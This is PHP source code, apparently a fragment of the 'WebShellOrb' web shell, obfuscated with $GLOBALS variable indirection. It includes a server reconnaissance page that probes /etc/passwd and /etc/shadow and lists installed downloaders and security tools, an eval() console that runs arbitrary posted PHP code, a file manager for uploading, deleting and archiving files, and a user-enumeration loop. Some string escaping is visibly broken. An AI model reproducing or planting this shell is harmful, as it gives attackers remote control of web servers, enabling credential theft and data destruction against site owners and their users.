${${"GLOBALS"}["ohjadiupdto"]} .= ((${$ilolonrsko} & 0x0040) ? ((${${"GLOBALS"}["vwhnmvbzmuqd"]} & 0x0800) ? "s" : "x") : ((${${"GLOBALS"}["vwhnmvbzmuqd"]} & 0x0800) ? "S" : "-"));
${${"GLOBALS"}["clkuyojj"]} .= ((${$qkybts} & 0x0020) ? "r" : "-");
${"GLOBALS"}["shsxvtn"] = "p";
${${"GLOBALS"}["clkuyojj"]} .= ((${${"GLOBALS"}["vwhnmvbzmuqd"]} & 0x0010) ? "w" : "-");
${${"GLOBALS"}["yxcnjhn"]} .= ((${${"GLOBALS"}["vwhnmvbzmuqd"]} & 0x0008) ? ((${${"GLOBALS"}["shsxvtn"]} & 0x0400) ? "s" : "x") : ((${$iwcqbfpgngg} & 0x0400) ? "S" : "-"));
${${"GLOBALS"}["clkuyojj"]} .= ((${${"GLOBALS"}["idxhruzeutti"]} & 0x0004) ? "r" : "-");
${${"GLOBALS"}["clkuyojj"]} .= ((${${"GLOBALS"}["olqfmkengz"]} & 0x0002) ? "w" : "-");
${${"GLOBALS"}["clkuyojj"]} .= ((${${"GLOBALS"}["vwhnmvbzmuqd"]} & 0x0001) ? ((${$qwyrtxgnisf} & 0x0200) ? "t" : "x") : ((${$jupethhvkj} & 0x0200) ? "T" : "-"));
return ${${"GLOBALS"}["clkuyojj"]};
}
function WebShellOrbPermsColor($f)
{
$hfgpvmt = "f";
${"GLOBALS"}["wmakjqctvr"] = "f";
${"GLOBALS"}["pigyuorhk"] = "f";
if (!@is_readable(${${"GLOBALS"}["pigyuorhk"]}))
return "<font color=#FF0000>" . WebShellOrbPerms(@fileperms(${$hfgpvmt})) . "</font>";
elseif (!@is_writable(${${"GLOBALS"}["wmakjqctvr"]}))
return "<font color=white>" . WebShellOrbPerms(@fileperms(${${"GLOBALS"}["sberlg"]})) . "</font>";
else
return "<font color=#25ff00>" . WebShellOrbPerms(@fileperms(${${"GLOBALS"}["sberlg"]})) . "</font>";
}
function WebShellOrbScandir($dir)
{
if (function_exists("scandir")) {
return scandir(${${"GLOBALS"}["leuwumt"]});
} else {
$otrhvbrub = "dh";
$psbyngpqum = "dir";
${"GLOBALS"}["iscgrvyvt"] = "files";
${${"GLOBALS"}["qubwkb"]} = opendir(${$psbyngpqum});
while (false !== (${${"GLOBALS"}["rbasqp"]} = readdir(${$otrhvbrub})))
${${"GLOBALS"}["yluxecll"]}[] = ${${"GLOBALS"}["rbasqp"]};
return ${${"GLOBALS"}["iscgrvyvt"]};
}
}
function WebShellOrbWhich($p)
{
$xtktpfotwm = "path";
$sdrdcmtgqy = "path";
$xawrvw = "path";
${$xtktpfotwm} = WebShellOrbEx("which " . ${${"GLOBALS"}["vwhnmvbzmuqd"]});
if (!empty(${$sdrdcmtgqy}))
return ${$xawrvw};
return false;
}
function actionSecInfo()
{
$domtksocnh = "temp";
WebShellOrbHeader();
echo "<h1>Server security information</h1><div class=content>";
function WebShellOrbSecParam($n, $v)
{
$nhauwowc = "v";
${${"GLOBALS"}["vvdxmjbgec"]} = trim(${$nhauwowc});
if (${${"GLOBALS"}["vvdxmjbgec"]}) {
echo "<span>" . ${${"GLOBALS"}["onmdrx"]} . ": </span>";
$hvsxdsrcv = "v";
if (strpos(${$hvsxdsrcv}, "
") === false)
echo ${${"GLOBALS"}["vvdxmjbgec"]} . "<br>";
else
echo "<pre class=ml1>" . ${${"GLOBALS"}["vvdxmjbgec"]} . "</pre>";
}
}
WebShellOrbSecParam("Server software", @getenv("SERVER_SOFTWARE"));
if (function_exists("apache_get_modules"))
WebShellOrbSecParam("Loaded Apache modules", implode(", ", apache_get_modules()));
WebShellOrbSecParam("Disabled PHP Functions", $GLOBALS["disable_functions"] ? $GLOBALS["disable_functions"] : "none");
WebShellOrbSecParam("Open base dir", @ini_get("open_basedir"));
WebShellOrbSecParam("Safe mode exec dir", @ini_get("safe_mode_exec_dir"));
${"GLOBALS"}["ydhhbkwyd"] = "temp";
WebShellOrbSecParam("Safe mode include dir", @ini_get("safe_mode_include_dir"));
WebShellOrbSecParam("cURL support", function_exists("curl_version") ? "enabled" : "no");
${"GLOBALS"}["obxtsbkf"] = "temp";
${${"GLOBALS"}["mercgmdwe"]} = array();
if (function_exists("mysql_get_client_info"))
${${"GLOBALS"}["mercgmdwe"]}[] = "MySql (" . mysql_get_client_info() . ")";
if (function_exists("mssql_connect"))
${${"GLOBALS"}["mercgmdwe"]}[] = "MSSQL";
if (function_exists("pg_connect"))
${${"GLOBALS"}["ydhhbkwyd"]}[] = "PostgreSQL";
if (function_exists("oci_connect"))
${${"GLOBALS"}["obxtsbkf"]}[] = "Oracle";
WebShellOrbSecParam("Supported databases", implode(", ", ${$domtksocnh}));
echo "<br>";
if ($GLOBALS["os"] == "nix") {
WebShellOrbSecParam("Readable /etc/passwd", @is_readable("/etc/passwd") ? "yes <a href='#' onclick='g(\"FilesTools\", "/etc/\", \"passwd\")'>[view]</a>" : "no");
WebShellOrbSecParam("Readable /etc/shadow", @is_readable("/etc/shadow") ? "yes <a href='#' onclick='g("FilesTools\", \"/etc/", \"shadow")'>[view]</a>" : "no");
WebShellOrbSecParam("OS version", @file_get_contents("/proc/version"));
WebShellOrbSecParam("Distr name", @file_get_contents("/etc/issue.net"));
if (!$GLOBALS["safe_mode"]) {
$ydxmggcqmkt = "userful";
$dvbwwqcdpb = "userful";
${"GLOBALS"}["eyrbmlm"] = "downloaders";
${$dvbwwqcdpb} = array(
"gcc",
"lcc",
"cc",
"ld",
"make",
"php",
"perl",
"python",
"ruby",
"tar",
"gzip",
"bzip",
"bzip2",
"nc",
"locate",
"suidperl"
);
${"GLOBALS"}["cgkqyr"] = "temp";
${"GLOBALS"}["lgubixlbyzdk"] = "temp";
${${"GLOBALS"}["phgjytx"]} = array(
"kav",
"nod32",
"bdcored",
"uvscan",
"sav",
"drwebd",
"clamd",
"rkhunter",
"chkrootkit",
"iptables",
"ipfw",
"tripwire",
"shieldcc",
"portsentry",
"snort",
"ossec",
"lidsadm",
"tcplodg",
"sxid",
"logcheck",
"logwatch",
"sysmask",
"zmbscap",
"sawmill",
"wormscan",
"ninja"
);
${${"GLOBALS"}["eyrbmlm"]} = array(
"wget",
"fetch",
"lynx",
"links",
"curl",
"get",
"lwp-mirror"
);
${"GLOBALS"}["fbbgsxezkw"] = "downloaders";
echo "<br>";
${${"GLOBALS"}["cgkqyr"]} = array();
${"GLOBALS"}["kieabyzpe"] = "item";
$cwtvyfrpbof = "temp";
foreach (${$ydxmggcqmkt} as ${${"GLOBALS"}["kieabyzpe"]}) {
$ivvheocsptu = "temp";
if (WebShellOrbWhich(${${"GLOBALS"}["bdmqwqvfqn"]}))
${$ivvheocsptu}[] = ${${"GLOBALS"}["bdmqwqvfqn"]};
}
WebShellOrbSecParam("Userful", implode(", ", ${$cwtvyfrpbof}));
${"GLOBALS"}["oubdfqdxj"] = "temp";
${${"GLOBALS"}["lgubixlbyzdk"]} = array();
$mtkmrotbjk = "temp";
foreach (${${"GLOBALS"}["phgjytx"]} as ${${"GLOBALS"}["bdmqwqvfqn"]}) {
$lkqsebumlt = "item";
$ymipnakanypt = "temp";
if (WebShellOrbWhich(${${"GLOBALS"}["bdmqwqvfqn"]}))
${$ymipnakanypt}[] = ${$lkqsebumlt};
}
WebShellOrbSecParam("Danger", implode(", ", ${${"GLOBALS"}["mercgmdwe"]}));
${${"GLOBALS"}["oubdfqdxj"]} = array();
foreach (${${"GLOBALS"}["fbbgsxezkw"]} as ${${"GLOBALS"}["bdmqwqvfqn"]}) {
${"GLOBALS"}["oeqqhrcmpi"] = "item";
if (WebShellOrbWhich(${${"GLOBALS"}["oeqqhrcmpi"]}))
${${"GLOBALS"}["mercgmdwe"]}[] = ${${"GLOBALS"}["bdmqwqvfqn"]};
}
WebShellOrbSecParam("Downloaders", implode(", ", ${$mtkmrotbjk}));
echo "<br/>";
WebShellOrbSecParam("HDD space", WebShellOrbEx("df -h"));
WebShellOrbSecParam("Hosts", @file_get_contents("/etc/hosts"));
echo "<br/><span>posix_getpwuid (\"Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5\",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=\">>"></form>";
if (isset($_POST["p2"], $_POST["p3"]) && is_numeric($_POST["p2"]) && is_numeric($_POST["p3"])) {
${"GLOBALS"}["fyllsuxigk"] = "temp";
${${"GLOBALS"}["fyllsuxigk"]} = "";
$ycgoqwhau = "temp";
for (; $_POST["p2"] <= $_POST["p3"]; $_POST["p2"]++) {
$yntzsuru = "uid";
$llkcgbksjw = "uid";
${"GLOBALS"}["wmupdsqhyt"] = "uid";
${$yntzsuru} = @posix_getpwuid($_POST["p2"]);
if (${${"GLOBALS"}["wmupdsqhyt"]})
${${"GLOBALS"}["mercgmdwe"]} .= join(":", ${$llkcgbksjw}) . "
";
}
echo "<br/>";
WebShellOrbSecParam("Users", ${$ycgoqwhau});
}
}
} else {
WebShellOrbSecParam("OS Version", WebShellOrbEx("ver"));
WebShellOrbSecParam("Account Settings", WebShellOrbEx("net accounts"));
WebShellOrbSecParam("User Accounts", WebShellOrbEx("net user"));
}
echo "</div>";
WebShellOrbFooter();
}
function actionPhp()
{
if (isset($_POST["ajax"])) {
WebShellOrbsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", true);
ob_start();
eval($_POST["p1"]);
${${"GLOBALS"}["mercgmdwe"]} = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "
\'") . "';
";
$qpbfjuxdtq = "temp";
echo strlen(${$qpbfjuxdtq}), "
", ${${"GLOBALS"}["mercgmdwe"]};
exit;
}
if (empty($_POST["ajax"]) && !empty($_POST["p1"]))
WebShellOrbsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", 0);
WebShellOrbHeader();
if (isset($_POST["p2"]) && ($_POST["p2"] == "info")) {
echo "<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>";
ob_start();
phpinfo();
${${"GLOBALS"}["ecbcmiybue"]} = ob_get_clean();
${${"GLOBALS"}["ecbcmiybue"]} = preg_replace(array(
"!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU",
"!td, th {(.*)}!msiU",
"!<img[^>]+>!msiU"
), array(
"",
".e, .v, .h, .h th {\$1}",
""
), ${${"GLOBALS"}["ecbcmiybue"]});
echo str_replace("<h1", "<h2", ${${"GLOBALS"}["ecbcmiybue"]}) . "</div><br>";
}
echo "<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a('Php',null,this.code.value);}else{g('Php',null,this.code.value,'');}return false;\"><textarea name=code class=bigarea id=PhpCode>" . (!empty($_POST["p1"]) ? htmlspecialchars($_POST["p1"]) : "") . "</textarea><input type=submit value=Eval style=\"margin-top:5px\">";
echo " <input type=checkbox name=ajax value=1 " . ($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : "") . "> send using AJAX</form><pre id=PhpOutput style=\"" . (empty($_POST["p1"]) ? "display:none;" : "") . "margin-top:5px;\" class=ml1>";
if (!empty($_POST["p1"])) {
ob_start();
eval($_POST["p1"]);
echo htmlspecialchars(ob_get_clean());
}
echo "</pre></div>";
WebShellOrbFooter();
}
function actionFilesMan()
{
if (!empty($_COOKIE["f"]))
$_COOKIE["f"] = @unserialize($_COOKIE["f"]);
${"GLOBALS"}["zipfvc"] = "i";
${"GLOBALS"}["uybulpgdyfek"] = "dirContent";
$nqwroep = "sort";
if (!empty($_POST["p1"])) {
switch ($_POST["p1"]) {
case "uploadFile":
if (!@move_uploaded_file($_FILES["f"]["tmp_name"], $_FILES["f"]["name"]))
echo "Can't upload!";
break;
case "mkdir":
if (!@mkdir($_POST["p2"]))
echo "Can't create!";
break;
case "delete":
function deleteDir($path)
{
${"GLOBALS"}["tyivhisdf"] = "dh";
${"GLOBALS"}["hsdgjldoiv"] = "path";
$nqtkcimv = "path";
${"GLOBALS"}["qeascvequr"] = "path";
${${"GLOBALS"}["hsdgjldoiv"]} = (substr(${${"GLOBALS"}["ffswlhab"]}, -1) == "/") ? ${${"GLOBALS"}["qeascvequr"]} : ${$nqtkcimv} . "/";
${"GLOBALS"}["onggmjje"] = "item";
${${"GLOBALS"}["tyivhisdf"]} = opendir(${${"GLOBALS"}["ffswlhab"]});
while ((${${"GLOBALS"}["onggmjje"]} = readdir(${${"GLOBALS"}["qubwkb"]})) !== false) {
${"GLOBALS"}["beufkfvrowh"] = "item";
${"GLOBALS"}["ysndbcr"] = "item";
${"GLOBALS"}["onmtwol"] = "item";
$nnxvvisqys = "type";
$rhijetcnxolz = "item";
$xnjcrutjrcsn = "path";
${${"GLOBALS"}["beufkfvrowh"]} = ${$xnjcrutjrcsn} . ${${"GLOBALS"}["onmtwol"]};
if ((basename(${$rhijetcnxolz}) == "..") || (basename(${${"GLOBALS"}["bdmqwqvfqn"]}) == "."))
continue;
${$nnxvvisqys} = filetype(${${"GLOBALS"}["ysndbcr"]});
if (${${"GLOBALS"}["vxhdoihqlkd"]} == "dir")
deleteDir(${${"GLOBALS"}["bdmqwqvfqn"]});
else
@unlink(${${"GLOBALS"}["bdmqwqvfqn"]});
}
closedir(${${"GLOBALS"}["qubwkb"]});
@rmdir(${${"GLOBALS"}["ffswlhab"]});
}
if (is_array(@$_POST["f"])) {
foreach ($_POST["f"] as ${${"GLOBALS"}["sberlg"]}) {
$oqqgeuaw = "f";
${"GLOBALS"}["qvynxye"] = "f";
if (${${"GLOBALS"}["sberlg"]} == "..")
continue;
${${"GLOBALS"}["qvynxye"]} = urldecode(${${"GLOBALS"}["sberlg"]});
$knyiyrjbngh = "f";
if (is_dir(${$knyiyrjbngh}))
deleteDir(${$oqqgeuaw});
else
@unlink(${${"GLOBALS"}["sberlg"]});
}
}
break;
case "paste":
if ($_COOKIE["act"] == "copy") {
${"GLOBALS"}["ckzlqvynxr"] = "f";
function copy_paste($c, $s, $d)
{
${"GLOBALS"}["fagwgfre"] = "c";
$hvvjqfgsnbl = "s";
${"GLOBALS"}["dcsfki"] = "s";
$oswcoish = "d";
$ckvihtigyzh = "s";
if (is_dir(${${"GLOBALS"}["sbuwwkozt"]} . ${${"GLOBALS"}["dcsfki"]})) {
${"GLOBALS"}["vpkbwytyc"] = "d";
$dezosh = "h";
mkdir(${${"GLOBALS"}["vpkbwytyc"]} . ${${"GLOBALS"}["uopupgy"]});
$ciuvfitrhtj = "h";
${$dezosh} = @opendir(${${"GLOBALS"}["sbuwwkozt"]} . ${${"GLOBALS"}["uopupgy"]});
while ((${${"GLOBALS"}["sberlg"]} = @readdir(${$ciuvfitrhtj})) !== false) {
$cplqlcligwi = "d";
$ojvunulgmom = "f";
if ((${${"GLOBALS"}["sberlg"]} != ".") and (${$ojvunulgmom} != ".."))
copy_paste(${${"GLOBALS"}["sbuwwkozt"]} . ${${"GLOBALS"}["uopupgy"]} . "/", ${${"GLOBALS"}["sberlg"]}, ${$cplqlcligwi} . ${${"GLOBALS"}["uopupgy"]} . "/");
}
} elseif (is_file(${${"GLOBALS"}["fagwgfre"]} . ${$ckvihtigyzh}))
@copy(${${"GLOBALS"}["sbuwwkozt"]} . ${$hvvjqfgsnbl}, ${$oswcoish} . ${${"GLOBALS"}["uopupgy"]});
}
${"GLOBALS"}["igaqgk"] = "f";
foreach ($_COOKIE["f"] as ${${"GLOBALS"}["ckzlqvynxr"]})
copy_paste($_COOKIE["c"], ${${"GLOBALS"}["igaqgk"]}, $GLOBALS["cwd"]);
} elseif ($_COOKIE["act"] == "move") {
$rhlfmvixur = "f";
function move_paste($c, $s, $d)
{
$ahtgbwuonw = "s";
$ckcnhxgr = "c";
$qppskt = "s";
if (is_dir(${${"GLOBALS"}["sbuwwkozt"]} . ${${"GLOBALS"}["uopupgy"]})) {
$pkkrsanx = "f";
${"GLOBALS"}["osjfesfa"] = "s";
${"GLOBALS"}["nocfbvcoh"] = "s";
$udkwdkzhbud = "c";
mkdir(${${"GLOBALS"}["smcbgcyi"]} . ${${"GLOBALS"}["osjfesfa"]});
$sutihmtajih = "h";
${$sutihmtajih} = @opendir(${$udkwdkzhbud} . ${${"GLOBALS"}["nocfbvcoh"]});
while ((${$pkkrsanx} = @readdir(${${"GLOBALS"}["aihxtguj"]})) !== false) {
${"GLOBALS"}["cnuikedo"] = "s";
if ((${${"GLOBALS"}["sberlg"]} != ".") and (${${"GLOBALS"}["sberlg"]} != ".."))
copy_paste(${${"GLOBALS"}["sbuwwkozt"]} . ${${"GLOBALS"}["cnuikedo"]} . "/", ${${"GLOBALS"}["sberlg"]}, ${${"GLOBALS"}["smcbgcyi"]} . ${${"GLOBALS"}["uopupgy"]} . "/");
}
} elseif (@is_file(${${"GLOBALS"}["sbuwwkozt"]} . ${${"GLOBALS"}["uopupgy"]}))
@copy(${$ckcnhxgr} . ${$ahtgbwuonw}, ${${"GLOBALS"}["smcbgcyi"]} . ${$qppskt});
}
foreach ($_COOKIE["f"] as ${${"GLOBALS"}["sberlg"]})
@rename($_COOKIE["c"] . ${${"GLOBALS"}["sberlg"]}, $GLOBALS["cwd"] . ${$rhlfmvixur});
} elseif ($_COOKIE["act"] == "zip") {
if (class_exists("ZipArchive")) {
$xkzwkjkkkw = "zip";
${$xkzwkjkkkw} = new ZipArchive();
if ($zip->open($_POST["p2"], 1)) {
chdir($_COOKIE["c"]);
$turyinpqob = "f";
foreach ($_COOKIE["f"] as ${$turyinpqob}) {
$dgpduipixc = "f";
$ouqnccnwl = "f";
if (${$dgpduipixc} == "..")
continue;
if (@is_file($_COOKIE["c"] . ${${"GLOBALS"}["sberlg"]}))
$zip->addFile($_COOKIE["c"] . ${${"GLOBALS"}["sberlg"]}, ${$ouqnccnwl});
elseif (@is_dir($_COOKIE["c"] . ${${"GLOBALS"}["sberlg"]})) {
${"GLOBALS"}["vewtqi"] = "f";
${"GLOBALS"}["qunyavcp"] = "key";
${"GLOBALS"}["yeflfsw"] = "value";
$rimshoiye = "iterator";
${${"GLOBALS"}["xqjcyjffi"]} = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(${${"GLOBALS"}["vewtqi"]} . "/", FilesystemIterator::SKIP_DOTS));
foreach (${$rimshoiye} as ${${"GLOBALS"}["qunyavcp"]} => ${${"GLOBALS"}["yeflfsw"]}) {
$smkpdcroxja = "key";
$zip->addFile(realpath(${${"GLOBALS"}["oocwabo"]}), ${$smkpdcroxja});
}
}
}
chdir($GLOBALS["cwd"]);
$zip->close();
}
}
} elseif ($_COOKIE["act"] == "unzip") {
if (class_exists("ZipArchive")) {
${"GLOBALS"}["edkqvu"] = "zip";
${${"GLOBALS"}["edkqvu"]} = new ZipArchive();
foreach ($_COOKIE["f"] as ${${"GLOBALS"}["sberlg"]}) {
${"GLOBALS"}["tonnmmh"] = "f";
if ($zip->open($_COOKIE["c"] . ${${"GLOBALS"}["tonnmmh"]})) {
$zip->extractTo($GLOBALS["cwd"]);
$zip->close();
}
}
}
} elseif ($_COOKIE["act"] == "tar") {
chdir($_COOKIE["c"]);
$_COOKIE["f"] = array_map("escapeshellarg", $_COOKIE["f"]);
WebShellOrbEx("tar cfzv " . escapeshellarg($_POST["p2"]) . " " . implode(" ", $_COOKIE["f"]));
chdir($GLOBALS["cwd"]);
}
unset($_COOKIE["f"]);
setcookie("f", "", time() - 3600);
break;
default:
if (!empty($_POST["p1"])) {
WebShellOrbsetcookie("act", $_POST["p1"]);
WebShellOrbsetcookie("f", serialize(@$_POST["f"]));
WebShellOrbsetcookie("c", @$_POST["c"]);
}
break;
}
}
${"GLOBALS"}["qvpbfls"] = "dirContent";
$kmcbnuop = "sort";
WebShellOrbHeader();
echo "<h1>File manager</h1><div class=content><script>p1_=p2_=p3_=\"\";</script>";
${${"GLOBALS"}["qvpbfls"]} = WebShellOrbScandir(isset($_POST["c"]) ? $_POST["c"] : $GLOBALS["cwd"]);
if (${${"GLOBALS"}["uybulpgdyfek"]} === false) {
echo "Can't open this folder!";
WebShellOrbFooter();
return;
}
${"GLOBALS"}["urslvvevcyd"] = "files";
global $sort;
${$kmcbnuop} = array(
"name",
1
);
${"GLOBALS"}["ucfmbrelsm"] = "files";
if (!empty($_POST["p1"])) {
${"GLOBALS"}["xqnxrgg"] = "match";
if (preg_match("!s_([A-z]+)_(\d{1})!", $_POST["p1"], ${${"GLOBALS"}["xqnxrgg"]}))
${${"GLOBALS"}["wxflrkghg"]} = array(
${${"GLOBALS"}["khtkbtbcp"]}[1],
(int) ${${"GLOBALS"}["khtkbtbcp"]}[2]
);
}
echo "<script>
function sa() {
for(i=0;i<d.files.elements.length;i++)
if(d.files.elements[i].type == 'checkbox')
d.files.elements[i].checked = d.files.elements[0].checked;
}
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan\",null,\"s_name_" . (${${"GLOBALS"}["wxflrkghg"]}[1] ? 0 : 1) . "")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan",null,"s_size_" . (${${"GLOBALS"}["wxflrkghg"]}[1] ? 0 : 1) . "\")'>Size</a></th><th><a href='#' onclick='g("FilesMan\",null,\"s_modify_" . (${${"GLOBALS"}["wxflrkghg"]}[1] ? 0 : 1) . "\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan\",null,\"s_perms_" . (${$nqwroep}[1] ? 0 : 1) . "")'>Permissions</a></th><th>Actions</th></tr>";
${${"GLOBALS"}["xzocqroestsp"]} = ${${"GLOBALS"}["ucfmbrelsm"]} = array();
${"GLOBALS"}["pwjxzgtesey"] = "n";
${${"GLOBALS"}["onmdrx"]} = count(${${"GLOBALS"}["qanhuo"]});
for (${${"GLOBALS"}["clkuyojj"]} = 0; ${${"GLOBALS"}["clkuyojj"]} < ${${"GLOBALS"}["pwjxzgtesey"]}; ${${"GLOBALS"}["zipfvc"]}++) {
${"GLOBALS"}["pdavystbnb"] = "dirContent";
$dccmvjub = "tmp";
${"GLOBALS"}["rqmafuvr"] = "i";
$igxyngssey = "tmp";
$olxfijt = "dirContent";
${"GLOBALS"}["mlougu"] = "i";
$xqzsqep = "dirContent";
${"GLOBALS"}["phbvllhebmmy"] = "i";
${"GLOBALS"}["egevsdguy"] = "i";
$umpvgjutp = "gr";
${"GLOBALS"}["jjvkvgxrrgr"] = "gr";
${"GLOBALS"}["kyldppgou"] = "dirContent";
$dfpwsfgwzk = "i";
${${"GLOBALS"}["zppzcsfgo"]} = @posix_getpwuid(@fileowner(${$olxfijt}[${${"GLOBALS"}["clkuyojj"]}]));
$kbjcjgsc = "i";
${"GLOBALS"}["yovvctdkx"] = "dirContent";
$kvhmbnzvd = "dirContent";
${$umpvgjutp} = @posix_getgrgid(@filegroup(${${"GLOBALS"}["qanhuo"]}[${${"GLOBALS"}["phbvllhebmmy"]}]));
$fdkdqgpmwo = "i";
${"GLOBALS"}["prriunh"] = "ow";
${${"GLOBALS"}["ecbcmiybue"]} = array(
"name" => ${${"GLOBALS"}["kyldppgou"]}[${${"GLOBALS"}["clkuyojj"]}],
"path" => $GLOBALS["cwd"] . ${${"GLOBALS"}["qanhuo"]}[${${"GLOBALS"}["clkuyojj"]}],
"modify" => date("Y-m-d H:i:s", @filemtime($GLOBALS["cwd"] . ${${"GLOBALS"}["qanhuo"]}[${$kbjcjgsc}])),
"perms" => WebShellOrbPermsColor($GLOBALS["cwd"] . ${${"GLOBALS"}["qanhuo"]}[${${"GLOBALS"}["clkuyojj"]}]),
"size" => @filesize($GLOBALS["cwd"] . ${$kvhmbnzvd}[${$dfpwsfgwzk}]),
"owner" => ${${"GLOBALS"}["prriunh"]}["name"] ? ${${"GLOBALS"}["zppzcsfgo"]}["name"] : @fileowner(${${"GLOBALS"}["pdavystbnb"]}[${${"GLOBALS"}["clkuyojj"]}]),
"group" => ${${"GLOBALS"}["jjvkvgxrrgr"]}["name"] ? ${${"GLOBALS"}["punnqnswy"]}["name"] : @filegroup(${$xqzsqep}[${${"GLOBALS"}["mlougu"]}])
);
${"GLOBALS"}["ihlumwlqnhp"] = "dirs";
if (@is_file($GLOBALS["cwd"] . ${${"GLOBALS"}["qanhuo"]}[${$fdkdqgpmwo}]))
${${"GLOBALS"}["yluxecll"]}[] = array_merge(${$igxyngssey}, array(
"type" => "file"
));
elseif (@is_link($GLOBALS["cwd"] . ${${"GLOBALS"}["qanhuo"]}[${${"GLOBALS"}["rqmafuvr"]}]))
${${"GLOBALS"}["xzocqroestsp"]}[] = array_merge(${${"GLOBALS"}["ecbcmiybue"]}, array(
"type" => "link",
"link" => readlink(${$dccmvjub}["path"])
));
elseif (@is_dir($GLOBALS["cwd"] . ${${"GLOBALS"}["yovvctdkx"]}[${${"GLOBALS"}["egevsdguy"]}]))
${${"GLOBALS"}["ihlumwlqnhp"]}[] = array_merge(${${"GLOBALS"}["ecbcmiybue"]}, array(
"type" => "dir"
));
}
$GLOBALS["sort"] = ${${"GLOBALS"}["wxflrkghg"]};
function WebShellOrbCmp($a, $b)
{
$wvhrpin = "b";
$cemcmlklowtc = "a";
if ($GLOBALS["sort"][0] != "size")
return strcmp(strtolower(${${"GLOBALS"}["cxfbyfxajt"]}[$GLOBALS["sort"][0]]), strtolower(${$wvhrpin}[$GLOBALS["sort"][0]])) * ($GLOBALS["sort"][1] ? 1 : -1);
else
return ((${$cemcmlklowtc}["size"] < ${${"GLOBALS"}["slzbugds"]}["size"]) ? -1 : 1) * ($GLOBALS["sort"][1] ? 1 : -1);
}
usort(${${"GLOBALS"}["yluxecll"]}, "WebShellOrbCmp");
usort(${${"GLOBALS"}["xzocqroestsp"]}, "WebShellOrbCmp");
$fjurgbvuldau = "files";
${${"GLOBALS"}["yluxecll"]} = array_merge(${${"GLOBALS"}["xzocqroestsp"]}, ${${"GLOBALS"}["urslvvevcyd"]});
${${"GLOBALS"}["gayaio"]} = 0;
foreach (${$fjurgbvuldau} as ${${"GLOBALS"}["sberlg"]}) {
$dwvibzt = "f";
$etnrnpxldmn = "f";
${"GLOBALS"}["ccfvqihqjil"] = "f";
${"GLOBALS"}["szfifyf"] = "f";
$ftzjqt = "f";
$gnoadugbfdu = "f";
$djskevnnm = "f";
$mhjrxxhgopd = "f";
$lbmonmg = "f";
${"GLOBALS"}["zppmigmvqhk"] = "f";
$kjkiswjllpu = "f";
$oxvhme = "f";
${"GLOBALS"}["cpticd"] = "f";
${"GLOBALS"}["hthoifyfkl"] = "l";
echo "<tr" . (${${"GLOBALS"}["hthoifyfkl"]} ? " class=l1" : "") . "><td><input type=checkbox name="f[]" value="" . urlencode(${${"GLOBALS"}["sberlg"]}["name"]) . "" class=chkbx></td><td><a href=# onclick="" . ((${${"GLOBALS"}["szfifyf"]}["type"] == "file") ? "g('FilesTools',null,'" . urlencode(${${"GLOBALS"}["sberlg"]}["name"]) . "', 'view')">" . htmlspecialchars(${$lbmonmg}["name"]) : "g('FilesMan','" . ${$etnrnpxldmn}["path"] . "');\" " . (empty(${${"GLOBALS"}["sberlg"]}["link"]) ? "" : "title='{$f['link']}'") . "><b>[ " . htmlspecialchars(${${"GLOBALS"}["sberlg"]}["name"]) . " ]</b>") . "</a></td><td>" . ((${${"GLOBALS"}["sberlg"]}["type"] == "file") ? WebShellOrbViewSize(${$dwvibzt}["size"]) : ${$mhjrxxhgopd}["type"]) . "</td><td>" . ${${"GLOBALS"}["sberlg"]}["modify"] . "</td><td>" . ${${"GLOBALS"}["zppmigmvqhk"]}["owner"] . "/" . ${$djskevnnm}["group"] . "</td><td><a href=# onclick=\"g('FilesTools',null,'" . urlencode(${${"GLOBALS"}["ccfvqihqjil"]}["name"]) . "','chmod')\">" . ${$ftzjqt}["perms"] . "</td><td><a href="#\" onclick=\"g('FilesTools',null,'" . urlencode(${$gnoadugbfdu}["name"]) . "', 'rename')\">R</a> <a href="#" onclick=\"g('FilesTools',null,'" . urlencode(${${"GLOBALS"}["sberlg"]}["name"]) . "', 'touch')\">T</a>" . ((${${"GLOBALS"}["cpticd"]}["type"] == "file") ? " <a href="#" onclick=\"g('FilesTools',null,'" . urlencode(${$kjkiswjllpu}["name"]) . "', 'edit')">E</a> <a href=\"#\" onclick=\"g('FilesTools',null,'" . urlencode(${$oxvhme}["name"]) . "', 'download')">D</a>" : "") . "</td></tr>";
${${"GLOBALS"}["gayaio"]} = ${${"GLOBALS"}["gayaio"]} ? 0 : 1;
}
echo "<tr><td colspan=7>
<input type=hidden name=a value='FilesMan'>
<input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'>
<input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : "") . "'>
<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
if (class_exists("ZipArchive"))
echo "<option value='zip'>Compress (zip)</option><option value='unzip' selected>Uncompress (unzip)</option>";
echo "<option value='tar'>Compress (tar.gz)</option>";
if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"]))
echo "<option value='paste'>Paste / Compress</option>";
echo "</select> ";
if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"]) && (($_COOKIE["act"] == "zip") || ($_COOKIE["act"] == "tar")))
echo "file name: <input type=text name=p2 value='WebShellOrb_" . date("Ymd_His") . "." . ($_COOKIE["act"] == "zip" ? "zip" : "tar.gz") . "'> ";
echo "<input type='submit' value='>>'></td></tr></form></table></div>";
WebShellOrbFooter();
}
function actionStringTools()
{
if (!function_exists("hex2bin")) {
function hex2bin($p)
{
